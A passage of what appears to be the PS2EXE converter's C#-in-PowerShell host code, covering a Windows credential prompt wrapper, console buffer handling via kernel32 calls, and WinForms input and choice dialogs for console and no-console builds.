CredentialForm\r\n\t{\r\n\t\t[StructLayout(LayoutKind.Sequential, CharSet = CharSet.Unicode)]\r\n\t\tprivate struct CREDUI_INFO\r\n\t\t{\r\n\t\t\tpublic int cbSize;\r\n\t\t\tpublic IntPtr hwndParent;\r\n\t\t\tpublic string pszMessageText;\r\n\t\t\tpublic string pszCaptionText;\r\n\t\t\tpublic IntPtr hbmBanner;\r\n\t\t}\r\n\r\n\t\t[Flags]\r\n\t\tenum CREDUI_FLAGS\r\n\t\t{\r\n\t\t\tINCORRECT_PASSWORD = 0x1,\r\n\t\t\tDO_NOT_PERSIST = 0x2,\r\n\t\t\tREQUEST_ADMINISTRATOR = 0x4,\r\n\t\t\tEXCLUDE_CERTIFICATES = 0x8,\r\n\t\t\tREQUIRE_CERTIFICATE = 0x10,\r\n\t\t\tSHOW_SAVE_CHECK_BOX = 0x40,\r\n\t\t\tALWAYS_SHOW_UI = 0x80,\r\n\t\t\tREQUIRE_SMARTCARD = 0x100,\r\n\t\t\tPASSWORD_ONLY_OK = 0x200,\r\n\t\t\tVALIDATE_USERNAME = 0x400,\r\n\t\t\tCOMPLETE_USERNAME = 0x800,\r\n\t\t\tPERSIST = 0x1000,\r\n\t\t\tSERVER_CREDENTIAL = 0x4000,\r\n\t\t\tEXPECT_CONFIRMATION = 0x20000,\r\n\t\t\tGENERIC_CREDENTIALS = 0x40000,\r\n\t\t\tUSERNAME_TARGET_CREDENTIALS = 0x80000,\r\n\t\t\tKEEP_USERNAME = 0x100000,\r\n\t\t}\r\n\r\n\t\tpublic enum CredUIReturnCodes\r\n\t\t{\r\n\t\t\tNO_ERROR = 0,\r\n\t\t\tERROR_CANCELLED = 1223,\r\n\t\t\tERROR_NO_SUCH_LOGON_SESSION = 1312,\r\n\t\t\tERROR_NOT_FOUND = 1168,\r\n\t\t\tERROR_INVALID_ACCOUNT_NAME = 1315,\r\n\t\t\tERROR_INSUFFICIENT_BUFFER = 122,\r\n\t\t\tERROR_INVALID_PARAMETER = 87,\r\n\t\t\tERROR_INVALID_FLAGS = 1004,\r\n\t\t}\r\n\r\n\t\t[DllImport(\"credui\", CharSet = CharSet.Unicode)]\r\n\t\tprivate static extern CredUIReturnCodes CredUIPromptForCredentials(ref CREDUI_INFO creditUR,\r\n\t\t\tstring targetName,\r\n\t\t\tIntPtr reserved1,\r\n\t\t\tint iError,\r\n\t\t\tStringBuilder userName,\r\n\t\t\tint maxUserName,\r\n\t\t\tStringBuilder password,\r\n\t\t\tint maxPassword,\r\n\t\t\t[MarshalAs(UnmanagedType.Bool)] ref bool pfSave,\r\n\t\t\tCREDUI_FLAGS flags);\r\n\r\n\t\tpublic class UserPwd\r\n\t\t{\r\n\t\t\tpublic string User = string.Empty;\r\n\t\t\tpublic string Password = string.Empty;\r\n\t\t\tpublic string Domain = string.Empty;\r\n\t\t}\r\n\r\n\t\tinternal static UserPwd PromptForPassword(string caption, string message, string target, string user, PSCredentialTypes credTypes, PSCredentialUIOptions options)\r\n\t\t{\r\n\t\t\t// Flags und Variablen initialisieren\r\n\t\t\tStringBuilder userPassword = new StringBuilder(), userID = new StringBuilder(user, 128);\r\n\t\t\tCREDUI_INFO credUI = new CREDUI_INFO();\r\n\t\t\tif (!string.IsNullOrEmpty(message)) credUI.pszMessageText = message;\r\n\t\t\tif (!string.IsNullOrEmpty(caption)) credUI.pszCaptionText = caption;\r\n\t\t\tcredUI.cbSize = Marshal.SizeOf(credUI);\r\n\t\t\tbool save = false;\r\n\r\n\t\t\tCREDUI_FLAGS flags = CREDUI_FLAGS.DO_NOT_PERSIST;\r\n\t\t\tif ((credTypes & PSCredentialTypes.Generic) == PSCredentialTypes.Generic)\r\n\t\t\t{\r\n\t\t\t\tflags |= CREDUI_FLAGS.GENERIC_CREDENTIALS;\r\n\t\t\t\tif ((options & PSCredentialUIOptions.AlwaysPrompt) == PSCredentialUIOptions.AlwaysPrompt)\r\n\t\t\t\t{\r\n\t\t\t\t\tflags |= CREDUI_FLAGS.ALWAYS_SHOW_UI;\r\n\t\t\t\t}\r\n\t\t\t}\r\n\r\n\t\t\t// den Benutzer nach Kennwort fragen, grafischer Prompt\r\n\t\t\tCredUIReturnCodes returnCode = CredUIPromptForCredentials(ref credUI, target, IntPtr.Zero, 0, userID, 128, userPassword, 128, ref save, flags);\r\n\r\n\t\t\tif (returnCode == CredUIReturnCodes.NO_ERROR)\r\n\t\t\t{\r\n\t\t\t\tUserPwd ret = new UserPwd();\r\n\t\t\t\tret.User = userID.ToString();\r\n\t\t\t\tret.Password = userPassword.ToString();\r\n\t\t\t\tret.Domain = \"\";\r\n\t\t\t\treturn ret;\r\n\t\t\t}\r\n\r\n\t\t\treturn null;\r\n\t\t}\r\n\t}\r\n\"@ })\r\n\r\n\tinternal class PS2EXEHostRawUI : PSHostRawUserInterface\r\n\t{\r\n$(if ($noConsole){ @\"\r\n\t\t// Speicher für Konsolenfarben bei GUI-Output werden gelesen und gesetzt, aber im Moment nicht genutzt (for future use)\r\n\t\tprivate ConsoleColor ncBackgroundColor = ConsoleColor.White;\r\n\t\tprivate ConsoleColor ncForegroundColor = ConsoleColor.Black;\r\n\"@ } else {@\"\r\n\t\tconst int STD_OUTPUT_HANDLE = -11;\r\n\r\n\t\t//CHAR_INFO struct, which was a union in the old days\r\n\t\t// so we want to use LayoutKind.Explicit to mimic it as closely\r\n\t\t// as we can\r\n\t\t[StructLayout(LayoutKind.Explicit)]\r\n\t\tpublic struct CHAR_INFO\r\n\t\t{\r\n\t\t\t[FieldOffset(0)]\r\n\t\t\tinternal char UnicodeChar;\r\n\t\t\t[FieldOffset(0)]\r\n\t\t\tinternal char AsciiChar;\r\n\t\t\t[FieldOffset(2)] //2 bytes seems to work properly\r\n\t\t\tinternal UInt16 Attributes;\r\n\t\t}\r\n\r\n\t\t//COORD struct\r\n\t\t[StructLayout(LayoutKind.Sequential)]\r\n\t\tpublic struct COORD\r\n\t\t{\r\n\t\t\tpublic short X;\r\n\t\t\tpublic short Y;\r\n\t\t}\r\n\r\n\t\t//SMALL_RECT struct\r\n\t\t[StructLayout(LayoutKind.Sequential)]\r\n\t\tpublic struct SMALL_RECT\r\n\t\t{\r\n\t\t\tpublic short Left;\r\n\t\t\tpublic short Top;\r\n\t\t\tpublic short Right;\r\n\t\t\tpublic short Bottom;\r\n\t\t}\r\n\r\n\t\t/* Reads character and color attribute data from a rectangular block of character cells in a console screen buffer,\r\n\t\t\t and the function writes the data to a rectangular block at a specified location in the destination buffer. */\r\n\t\t[DllImport(\"kernel32.dll\", EntryPoint = \"ReadConsoleOutputW\", CharSet = CharSet.Unicode, SetLastError = true)]\r\n\t\tinternal static extern bool ReadConsoleOutput(\r\n\t\t\tIntPtr hConsoleOutput,\r\n\t\t\t/* This pointer is treated as the origin of a two-dimensional array of CHAR_INFO structures\r\n\t\t\twhose size is specified by the dwBufferSize parameter.*/\r\n\t\t\t[MarshalAs(UnmanagedType.LPArray), Out] CHAR_INFO[,] lpBuffer,\r\n\t\t\tCOORD dwBufferSize,\r\n\t\t\tCOORD dwBufferCoord,\r\n\t\t\tref SMALL_RECT lpReadRegion);\r\n\r\n\t\t/* Writes character and color attribute data to a specified rectangular block of character cells in a console screen buffer.\r\n\t\t\tThe data to be written is taken from a correspondingly sized rectangular block at a specified location in the source buffer */\r\n\t\t[DllImport(\"kernel32.dll\", EntryPoint = \"WriteConsoleOutputW\", CharSet = CharSet.Unicode, SetLastError = true)]\r\n\t\tinternal static extern bool WriteConsoleOutput(\r\n\t\t\tIntPtr hConsoleOutput,\r\n\t\t\t/* This pointer is treated as the origin of a two-dimensional array of CHAR_INFO structures\r\n\t\t\twhose size is specified by the dwBufferSize parameter.*/\r\n\t\t\t[MarshalAs(UnmanagedType.LPArray), In] CHAR_INFO[,] lpBuffer,\r\n\t\t\tCOORD dwBufferSize,\r\n\t\t\tCOORD dwBufferCoord,\r\n\t\t\tref SMALL_RECT lpWriteRegion);\r\n\r\n\t\t/* Moves a block of data in a screen buffer. The effects of the move can be limited by specifying a clipping rectangle, so\r\n\t\t\tthe contents of the console screen buffer outside the clipping rectangle are unchanged. */\r\n\t\t[DllImport(\"kernel32.dll\", SetLastError = true)]\r\n\t\tstatic extern bool ScrollConsoleScreenBuffer(\r\n\t\t\tIntPtr hConsoleOutput,\r\n\t\t\t[In] ref SMALL_RECT lpScrollRectangle,\r\n\t\t\t[In] ref SMALL_RECT lpClipRectangle,\r\n\t\t\tCOORD dwDestinationOrigin,\r\n\t\t\t[In] ref CHAR_INFO lpFill);\r\n\r\n\t\t[DllImport(\"kernel32.dll\", SetLastError = true)]\r\n\t\t\tstatic extern IntPtr GetStdHandle(int nStdHandle);\r\n\"@ })\r\n\r\n\t\tpublic override ConsoleColor BackgroundColor\r\n\t\t{\r\n$(if (!$noConsole){ @\"\r\n\t\t\tget\r\n\t\t\t{\r\n\t\t\t\treturn Console.BackgroundColor;\r\n\t\t\t}\r\n\t\t\tset\r\n\t\t\t{\r\n\t\t\t\tConsole.BackgroundColor = value;\r\n\t\t\t}\r\n\"@ } else {@\"\r\n\t\t\tget\r\n\t\t\t{\r\n\t\t\t\treturn ncBackgroundColor;\r\n\t\t\t}\r\n\t\t\tset\r\n\t\t\t{\r\n\t\t\t\tncBackgroundColor = value;\r\n\t\t\t}\r\n\"@ })\r\n\t\t}\r\n\r\n\t\tpublic override System.Management.Automation.Host.Size BufferSize\r\n\t\t{\r\n\t\t\tget\r\n\t\t\t{\r\n$(if (!$noConsole){ @\"\r\n\t\t\t\tif (ConsoleInfo.IsOutputRedirected())\r\n\t\t\t\t\t// return default value for redirection. If no valid value is returned WriteLine will not be called\r\n\t\t\t\t\treturn new System.Management.Automation.Host.Size(120, 50);\r\n\t\t\t\telse\r\n\t\t\t\t\treturn new System.Management.Automation.Host.Size(Console.BufferWidth, Console.BufferHeight);\r\n\"@ } else {@\"\r\n\t\t\t\t\t// return default value for Winforms. If no valid value is returned WriteLine will not be called\r\n\t\t\t\treturn new System.Management.Automation.Host.Size(120, 50);\r\n\"@ })\r\n\t\t\t}\r\n\t\t\tset\r\n\t\t\t{\r\n$(if (!$noConsole){ @\"\r\n\t\t\t\tConsole.BufferWidth = value.Width;\r\n\t\t\t\tConsole.BufferHeight = value.Height;\r\n\"@ })\r\n\t\t\t}\r\n\t\t}\r\n\r\n\t\tpublic override Coordinates CursorPosition\r\n\t\t{\r\n\t\t\tget\r\n\t\t\t{\r\n$(if (!$noConsole){ @\"\r\n\t\t\t\treturn new Coordinates(Console.CursorLeft, Console.CursorTop);\r\n\"@ } else {@\"\r\n\t\t\t\t// Dummywert für Winforms zurückgeben.\r\n\t\t\t\treturn new Coordinates(0, 0);\r\n\"@ })\r\n\t\t\t}\r\n\t\t\tset\r\n\t\t\t{\r\n$(if (!$noConsole){ @\"\r\n\t\t\t\tConsole.CursorTop = value.Y;\r\n\t\t\t\tConsole.CursorLeft = value.X;\r\n\"@ })\r\n\t\t\t}\r\n\t\t}\r\n\r\n\t\tpublic override int CursorSize\r\n\t\t{\r\n\t\t\tget\r\n\t\t\t{\r\n$(if (!$noConsole){ @\"\r\n\t\t\t\treturn Console.CursorSize;\r\n\"@ } else {@\"\r\n\t\t\t\t// Dummywert für Winforms zurückgeben.\r\n\t\t\t\treturn 25;\r\n\"@ })\r\n\t\t\t}\r\n\t\t\tset\r\n\t\t\t{\r\n$(if (!$noConsole){ @\"\r\n\t\t\t\tConsole.CursorSize = value;\r\n\"@ })\r\n\t\t\t}\r\n\t\t}\r\n\r\n$(if ($noConsole){ @\"\r\n\t\tprivate Form InvisibleForm = null;\r\n\"@ })\r\n\r\n\t\tpublic override void FlushInputBuffer()\r\n\t\t{\r\n$(if (!$noConsole){ @\"\r\n\t\t\tif (!ConsoleInfo.IsInputRedirected())\r\n\t\t\t{\twhile (Console.KeyAvailable)\r\n\t\t\t\t\tConsole.ReadKey(true);\r\n\t\t\t}\r\n\"@ } else {@\"\r\n\t\t\tif (InvisibleForm != null)\r\n\t\t\t{\r\n\t\t\t\tInvisibleForm.Close();\r\n\t\t\t\tInvisibleForm = null;\r\n\t\t\t}\r\n\t\t\telse\r\n\t\t\t{\r\n\t\t\t\tInvisibleForm = new Form();\r\n\t\t\t\tInvisibleForm.Opacity = 0;\r\n\t\t\t\tInvisibleForm.ShowInTaskbar = false;\r\n\t\t\t\tInvisibleForm.Visible = true;\r\n\t\t\t}\r\n\"@ })\r\n\t\t}\r\n\r\n\t\tpublic override ConsoleColor ForegroundColor\r\n\t\t{\r\n$(if (!$noConsole){ @\"\r\n\t\t\tget\r\n\t\t\t{\r\n\t\t\t\treturn Console.ForegroundColor;\r\n\t\t\t}\r\n\t\t\tset\r\n\t\t\t{\r\n\t\t\t\tConsole.ForegroundColor = value;\r\n\t\t\t}\r\n\"@ } else {@\"\r\n\t\t\tget\r\n\t\t\t{\r\n\t\t\t\treturn ncForegroundColor;\r\n\t\t\t}\r\n\t\t\tset\r\n\t\t\t{\r\n\t\t\t\tncForegroundColor = value;\r\n\t\t\t}\r\n\"@ })\r\n\t\t}\r\n\r\n\t\tpublic override BufferCell[,] GetBufferContents(System.Management.Automation.Host.Rectangle rectangle)\r\n\t\t{\r\n$(if ($compiler20) {@\"\r\n\t\t\tthrow new Exception(\"Method GetBufferContents not implemented for .Net V2.0 compiler\");\r\n\"@ } else { if (!$noConsole) {@\"\r\n\t\t\tIntPtr hStdOut = GetStdHandle(STD_OUTPUT_HANDLE);\r\n\t\t\tCHAR_INFO[,] buffer = new CHAR_INFO[rectangle.Bottom - rectangle.Top + 1, rectangle.Right - rectangle.Left + 1];\r\n\t\t\tCOORD buffer_size = new COORD() {X = (short)(rectangle.Right - rectangle.Left + 1), Y = (short)(rectangle.Bottom - rectangle.Top + 1)};\r\n\t\t\tCOORD buffer_index = new COORD() {X = 0, Y = 0};\r\n\t\t\tSMALL_RECT screen_rect = new SMALL_RECT() {Left = (short)rectangle.Left, Top = (short)rectangle.Top, Right = (short)rectangle.Right, Bottom = (short)rectangle.Bottom};\r\n\r\n\t\t\tReadConsoleOutput(hStdOut, buffer, buffer_size, buffer_index, ref screen_rect);\r\n\r\n\t\t\tSystem.Management.Automation.Host.BufferCell[,] ScreenBuffer = new System.Management.Automation.Host.BufferCell[rectangle.Bottom - rectangle.Top + 1, rectangle.Right - rectangle.Left + 1];\r\n\t\t\tfor (int y = 0; y <= rectangle.Bottom - rectangle.Top; y++)\r\n\t\t\t\tfor (int x = 0; x <= rectangle.Right - rectangle.Left; x++)\r\n\t\t\t\t{\r\n\t\t\t\t\tScreenBuffer[y,x] = new System.Management.Automation.Host.BufferCell(buffer[y,x].AsciiChar, (System.ConsoleColor)(buffer[y,x].Attributes & 0xF), (System.ConsoleColor)((buffer[y,x].Attributes & 0xF0) / 0x10), System.Management.Automation.Host.BufferCellType.Complete);\r\n\t\t\t\t}\r\n\r\n\t\t\treturn ScreenBuffer;\r\n\"@ } else {@\"\r\n\t\t\tSystem.Management.Automation.Host.BufferCell[,] ScreenBuffer = new System.Management.Automation.Host.BufferCell[rectangle.Bottom - rectangle.Top + 1, rectangle.Right - rectangle.Left + 1];\r\n\r\n\t\t\tfor (int y = 0; y <= rectangle.Bottom - rectangle.Top; y++)\r\n\t\t\t\tfor (int x = 0; x <= rectangle.Right - rectangle.Left; x++)\r\n\t\t\t\t{\r\n\t\t\t\t\tScreenBuffer[y,x] = new System.Management.Automation.Host.BufferCell(' ', ncForegroundColor, ncBackgroundColor, System.Management.Automation.Host.BufferCellType.Complete);\r\n\t\t\t\t}\r\n\r\n\t\t\treturn ScreenBuffer;\r\n\"@ } })\r\n\t\t}\r\n\r\n\t\tpublic override bool KeyAvailable\r\n\t\t{\r\n\t\t\tget\r\n\t\t\t{\r\n$(if (!$noConsole) {@\"\r\n\t\t\t\treturn Console.KeyAvailable;\r\n\"@ } else {@\"\r\n\t\t\t\treturn true;\r\n\"@ })\r\n\t\t\t}\r\n\t\t}\r\n\r\n\t\tpublic override System.Management.Automation.Host.Size MaxPhysicalWindowSize\r\n\t\t{\r\n\t\t\tget\r\n\t\t\t{\r\n$(if (!$noConsole){ @\"\r\n\t\t\t\treturn new System.Management.Automation.Host.Size(Console.LargestWindowWidth, Console.LargestWindowHeight);\r\n\"@ } else {@\"\r\n\t\t\t\t// Dummy-Wert für Winforms\r\n\t\t\t\treturn new System.Management.Automation.Host.Size(240, 84);\r\n\"@ })\r\n\t\t\t}\r\n\t\t}\r\n\r\n\t\tpublic override System.Management.Automation.Host.Size MaxWindowSize\r\n\t\t{\r\n\t\t\tget\r\n\t\t\t{\r\n$(if (!$noConsole){ @\"\r\n\t\t\t\treturn new System.Management.Automation.Host.Size(Console.BufferWidth, Console.BufferWidth);\r\n\"@ } else {@\"\r\n\t\t\t\t// Dummy-Wert für Winforms\r\n\t\t\t\treturn new System.Management.Automation.Host.Size(120, 84);\r\n\"@ })\r\n\t\t\t}\r\n\t\t}\r\n\r\n\t\tpublic override KeyInfo ReadKey(ReadKeyOptions options)\r\n\t\t{\r\n$(if (!$noConsole) {@\"\r\n\t\t\tConsoleKeyInfo cki = Console.ReadKey((options & ReadKeyOptions.NoEcho)!=0);\r\n\r\n\t\t\tControlKeyStates cks = 0;\r\n\t\t\tif ((cki.Modifiers & ConsoleModifiers.Alt) != 0)\r\n\t\t\t\tcks |= ControlKeyStates.LeftAltPressed | ControlKeyStates.RightAltPressed;\r\n\t\t\tif ((cki.Modifiers & ConsoleModifiers.Control) != 0)\r\n\t\t\t\tcks |= ControlKeyStates.LeftCtrlPressed | ControlKeyStates.RightCtrlPressed;\r\n\t\t\tif ((cki.Modifiers & ConsoleModifiers.Shift) != 0)\r\n\t\t\t\tcks |= ControlKeyStates.ShiftPressed;\r\n\t\t\tif (Console.CapsLock)\r\n\t\t\t\tcks |= ControlKeyStates.CapsLockOn;\r\n\t\t\tif (Console.NumberLock)\r\n\t\t\t\tcks |= ControlKeyStates.NumLockOn;\r\n\r\n\t\t\treturn new KeyInfo((int)cki.Key, cki.KeyChar, cks, (options & ReadKeyOptions.IncludeKeyDown)!=0);\r\n\"@ } else {@\"\r\n\t\t\tif ((options & ReadKeyOptions.IncludeKeyDown)!=0)\r\n\t\t\t\treturn ReadKeyBox.Show(\"\", \"\", true);\r\n\t\t\telse\r\n\t\t\t\treturn ReadKeyBox.Show(\"\", \"\", false);\r\n\"@ })\r\n\t\t}\r\n\r\n\t\tpublic override void ScrollBufferContents(System.Management.Automation.Host.Rectangle source, Coordinates destination, System.Management.Automation.Host.Rectangle clip, BufferCell fill)\r\n\t\t{ // no destination block clipping implemented\r\n$(if (!$noConsole) { if ($compiler20) {@\"\r\n\t\t\tthrow new Exception(\"Method ScrollBufferContents not implemented for .Net V2.0 compiler\");\r\n\"@ } else {@\"\r\n\t\t\t// clip area out of source range?\r\n\t\t\tif ((source.Left > clip.Right) || (source.Right < clip.Left) || (source.Top > clip.Bottom) || (source.Bottom < clip.Top))\r\n\t\t\t{ // clipping out of range -> nothing to do\r\n\t\t\t\treturn;\r\n\t\t\t}\r\n\r\n\t\t\tIntPtr hStdOut = GetStdHandle(STD_OUTPUT_HANDLE);\r\n\t\t\tSMALL_RECT lpScrollRectangle = new SMALL_RECT() {Left = (short)source.Left, Top = (short)source.Top, Right = (short)(source.Right), Bottom = (short)(source.Bottom)};\r\n\t\t\tSMALL_RECT lpClipRectangle;\r\n\t\t\tif (clip != null)\r\n\t\t\t{ lpClipRectangle = new SMALL_RECT() {Left = (short)clip.Left, Top = (short)clip.Top, Right = (short)(clip.Right), Bottom = (short)(clip.Bottom)}; }\r\n\t\t\telse\r\n\t\t\t{ lpClipRectangle = new SMALL_RECT() {Left = (short)0, Top = (short)0, Right = (short)(Console.WindowWidth - 1), Bottom = (short)(Console.WindowHeight - 1)}; }\r\n\t\t\tCOORD dwDestinationOrigin = new COORD() {X = (short)(destination.X), Y = (short)(destination.Y)};\r\n\t\t\tCHAR_INFO lpFill = new CHAR_INFO() { AsciiChar = fill.Character, Attributes = (ushort)((int)(fill.ForegroundColor) + (int)(fill.BackgroundColor)*16) };\r\n\r\n\t\t\tScrollConsoleScreenBuffer(hStdOut, ref lpScrollRectangle, ref lpClipRectangle, dwDestinationOrigin, ref lpFill);\r\n\"@ } })\r\n\t\t}\r\n\r\n\t\tpublic override void SetBufferContents(System.Management.Automation.Host.Rectangle rectangle, BufferCell fill)\r\n\t\t{\r\n$(if (!$noConsole){ @\"\r\n\t\t\t// using a trick: move the buffer out of the screen, the source area gets filled with the char fill.Character\r\n\t\t\tif (rectangle.Left >= 0)\r\n\t\t\t\tConsole.MoveBufferArea(rectangle.Left, rectangle.Top, rectangle.Right-rectangle.Left+1, rectangle.Bottom-rectangle.Top+1, BufferSize.Width, BufferSize.Height, fill.Character, fill.ForegroundColor, fill.BackgroundColor);\r\n\t\t\telse\r\n\t\t\t{ // Clear-Host: move all content off the screen\r\n\t\t\t\tConsole.MoveBufferArea(0, 0, BufferSize.Width, BufferSize.Height, BufferSize.Width, BufferSize.Height, fill.Character, fill.ForegroundColor, fill.BackgroundColor);\r\n\t\t\t}\r\n\"@ })\r\n\t\t}\r\n\r\n\t\tpublic override void SetBufferContents(Coordinates origin, BufferCell[,] contents)\r\n\t\t{\r\n$(if (!$noConsole) { if ($compiler20) {@\"\r\n\t\t\tthrow new Exception(\"Method SetBufferContents not implemented for .Net V2.0 compiler\");\r\n\"@ } else {@\"\r\n\t\t\tIntPtr hStdOut = GetStdHandle(STD_OUTPUT_HANDLE);\r\n\t\t\tCHAR_INFO[,] buffer = new CHAR_INFO[contents.GetLength(0), contents.GetLength(1)];\r\n\t\t\tCOORD buffer_size = new COORD() {X = (short)(contents.GetLength(1)), Y = (short)(contents.GetLength(0))};\r\n\t\t\tCOORD buffer_index = new COORD() {X = 0, Y = 0};\r\n\t\t\tSMALL_RECT screen_rect = new SMALL_RECT() {Left = (short)origin.X, Top = (short)origin.Y, Right = (short)(origin.X + contents.GetLength(1) - 1), Bottom = (short)(origin.Y + contents.GetLength(0) - 1)};\r\n\r\n\t\t\tfor (int y = 0; y < contents.GetLength(0); y++)\r\n\t\t\t\tfor (int x = 0; x < contents.GetLength(1); x++)\r\n\t\t\t\t{\r\n\t\t\t\t\tbuffer[y,x] = new CHAR_INFO() { AsciiChar = contents[y,x].Character, Attributes = (ushort)((int)(contents[y,x].ForegroundColor) + (int)(contents[y,x].BackgroundColor)*16) };\r\n\t\t\t\t}\r\n\r\n\t\t\tWriteConsoleOutput(hStdOut, buffer, buffer_size, buffer_index, ref screen_rect);\r\n\"@ } })\r\n\t\t}\r\n\r\n\t\tpublic override Coordinates WindowPosition\r\n\t\t{\r\n\t\t\tget\r\n\t\t\t{\r\n\t\t\t\tCoordinates s = new Coordinates();\r\n$(if (!$noConsole){ @\"\r\n\t\t\t\ts.X = Console.WindowLeft;\r\n\t\t\t\ts.Y = Console.WindowTop;\r\n\"@ } else {@\"\r\n\t\t\t\t// Dummy-Wert für Winforms\r\n\t\t\t\ts.X = 0;\r\n\t\t\t\ts.Y = 0;\r\n\"@ })\r\n\t\t\t\treturn s;\r\n\t\t\t}\r\n\t\t\tset\r\n\t\t\t{\r\n$(if (!$noConsole){ @\"\r\n\t\t\t\tConsole.WindowLeft = value.X;\r\n\t\t\t\tConsole.WindowTop = value.Y;\r\n\"@ })\r\n\t\t\t}\r\n\t\t}\r\n\r\n\t\tpublic override System.Management.Automation.Host.Size WindowSize\r\n\t\t{\r\n\t\t\tget\r\n\t\t\t{\r\n\t\t\t\tSystem.Management.Automation.Host.Size s = new System.Management.Automation.Host.Size();\r\n$(if (!$noConsole){ @\"\r\n\t\t\t\ts.Height = Console.WindowHeight;\r\n\t\t\t\ts.Width = Console.WindowWidth;\r\n\"@ } else {@\"\r\n\t\t\t\t// Dummy-Wert für Winforms\r\n\t\t\t\ts.Height = 50;\r\n\t\t\t\ts.Width = 120;\r\n\"@ })\r\n\t\t\t\treturn s;\r\n\t\t\t}\r\n\t\t\tset\r\n\t\t\t{\r\n$(if (!$noConsole){ @\"\r\n\t\t\t\tConsole.WindowWidth = value.Width;\r\n\t\t\t\tConsole.WindowHeight = value.Height;\r\n\"@ })\r\n\t\t\t}\r\n\t\t}\r\n\r\n\t\tpublic override string WindowTitle\r\n\t\t{\r\n\t\t\tget\r\n\t\t\t{\r\n$(if (!$noConsole){ @\"\r\n\t\t\t\treturn Console.Title;\r\n\"@ } else {@\"\r\n\t\t\t\treturn System.AppDomain.CurrentDomain.FriendlyName;\r\n\"@ })\r\n\t\t\t}\r\n\t\t\tset\r\n\t\t\t{\r\n$(if (!$noConsole){ @\"\r\n\t\t\t\tConsole.Title = value;\r\n\"@ })\r\n\t\t\t}\r\n\t\t}\r\n\t}\r\n\r\n$(if ($noConsole){ @\"\r\n\tpublic class InputBox\r\n\t{\r\n\t\t[DllImport(\"user32.dll\", CharSet = CharSet.Unicode, CallingConvention = CallingConvention.Cdecl)]\r\n\t\tprivate static extern IntPtr MB_GetString(uint strId);\r\n\r\n\t\tpublic static DialogResult Show(string sTitle, string sPrompt, ref string sValue, bool bSecure)\r\n\t\t{\r\n\t\t\t// Generate controls\r\n\t\t\tForm form = new Form();\r\n\t\t\tform.AutoScaleDimensions = new System.Drawing.SizeF(6F, 13F);\r\n\t\t\tform.AutoScaleMode = System.Windows.Forms.AutoScaleMode.Font;\r\n\t\t\tLabel label = new Label();\r\n\t\t\tTextBox textBox = new TextBox();\r\n\t\t\tButton buttonOk = new Button();\r\n\t\t\tButton buttonCancel = new Button();\r\n\r\n\t\t\t// Sizes and positions are defined according to the label\r\n\t\t\t// This control has to be finished first\r\n\t\t\tif (string.IsNullOrEmpty(sPrompt))\r\n\t\t\t{\r\n\t\t\t\tif (bSecure)\r\n\t\t\t\t\tlabel.Text = \"Secure input: \";\r\n\t\t\t\telse\r\n\t\t\t\t\tlabel.Text = \"Input: \";\r\n\t\t\t}\r\n\t\t\telse\r\n\t\t\t\tlabel.Text = sPrompt;\r\n\t\t\tlabel.Location = new Point(9, 19);\r\n\t\t\tlabel.MaximumSize = new System.Drawing.Size(System.Windows.Forms.Screen.FromControl(form).Bounds.Width*5/8 - 18, 0);\r\n\t\t\tlabel.AutoSize = true;\r\n\t\t\t// Size of the label is defined not before Add()\r\n\t\t\tform.Controls.Add(label);\r\n\r\n\t\t\t// Generate textbox\r\n\t\t\tif (bSecure) textBox.UseSystemPasswordChar = true;\r\n\t\t\ttextBox.Text = sValue;\r\n\t\t\ttextBox.SetBounds(12, label.Bottom, label.Right - 12, 20);\r\n\r\n\t\t\t// Generate buttons\r\n\t\t\t// get localized \"OK\"-string\r\n\t\t\tstring sTextOK = Marshal.PtrToStringUni(MB_GetString(0));\r\n\t\t\tif (string.IsNullOrEmpty(sTextOK))\r\n\t\t\t\tbuttonOk.Text = \"OK\";\r\n\t\t\telse\r\n\t\t\t\tbuttonOk.Text = sTextOK;\r\n\r\n\t\t\t// get localized \"Cancel\"-string\r\n\t\t\tstring sTextCancel = Marshal.PtrToStringUni(MB_GetString(1));\r\n\t\t\tif (string.IsNullOrEmpty(sTextCancel))\r\n\t\t\t\tbuttonCancel.Text = \"Cancel\";\r\n\t\t\telse\r\n\t\t\t\tbuttonCancel.Text = sTextCancel;\r\n\r\n\t\t\tbuttonOk.DialogResult = DialogResult.OK;\r\n\t\t\tbuttonCancel.DialogResult = DialogResult.Cancel;\r\n\t\t\tbuttonOk.SetBounds(System.Math.Max(12, label.Right - 158), label.Bottom + 36, 75, 23);\r\n\t\t\tbuttonCancel.SetBounds(System.Math.Max(93, label.Right - 77), label.Bottom + 36, 75, 23);\r\n\r\n\t\t\t// Configure form\r\n\t\t\tif (string.IsNullOrEmpty(sTitle))\r\n\t\t\t\tform.Text = System.AppDomain.CurrentDomain.FriendlyName;\r\n\t\t\telse\r\n\t\t\t\tform.Text = sTitle;\r\n\t\t\tform.ClientSize = new System.Drawing.Size(System.Math.Max(178, label.Right + 10), label.Bottom + 71);\r\n\t\t\tform.Controls.AddRange(new Control[] { textBox, buttonOk, buttonCancel });\r\n\t\t\tform.FormBorderStyle = FormBorderStyle.FixedDialog;\r\n\t\t\tform.StartPosition = FormStartPosition.CenterScreen;\r\n\t\t\ttry {\r\n\t\t\t\tform.Icon = Icon.ExtractAssociatedIcon(Assembly.GetExecutingAssembly().Location);\r\n\t\t\t}\r\n\t\t\tcatch\r\n\t\t\t{ }\r\n\t\t\tform.MinimizeBox = false;\r\n\t\t\tform.MaximizeBox = false;\r\n\t\t\tform.AcceptButton = buttonOk;\r\n\t\t\tform.CancelButton = buttonCancel;\r\n\r\n\t\t\t// Show form and compute results\r\n\t\t\tDialogResult dialogResult = form.ShowDialog();\r\n\t\t\tsValue = textBox.Text;\r\n\t\t\treturn dialogResult;\r\n\t\t}\r\n\r\n\t\tpublic static DialogResult Show(string sTitle, string sPrompt, ref string sValue)\r\n\t\t{\r\n\t\t\treturn Show(sTitle, sPrompt, ref sValue, false);\r\n\t\t}\r\n\t}\r\n\r\n\tpublic class ChoiceBox\r\n\t{\r\n\t\tpublic static int Show(System.Collections.ObjectModel.Collection<ChoiceDescription> aAuswahl, int iVorgabe, string sTitle, string sPrompt)\r\n\t\t{\r\n\t\t\t// cancel if array is empty\r\n\t\t\tif (aAuswahl == null) return -1;\r\n\t\t\tif (aAuswahl.Count < 1) return -1;\r\n\r\n\t\t\t// Generate controls\r\n\t\t\tForm form = new Form();\r\n\t\t\tform.AutoScaleDimensions = new System.Drawing.SizeF(6F, 13F);\r\n\t\t\tform.AutoScaleMode = System.Windows.Forms.AutoScaleMode.Font;\r\n\t\t\tRadioButton[] aradioButton = new RadioButton[aAuswahl.Count];\r\n\t\t\tToolTip toolTip = new 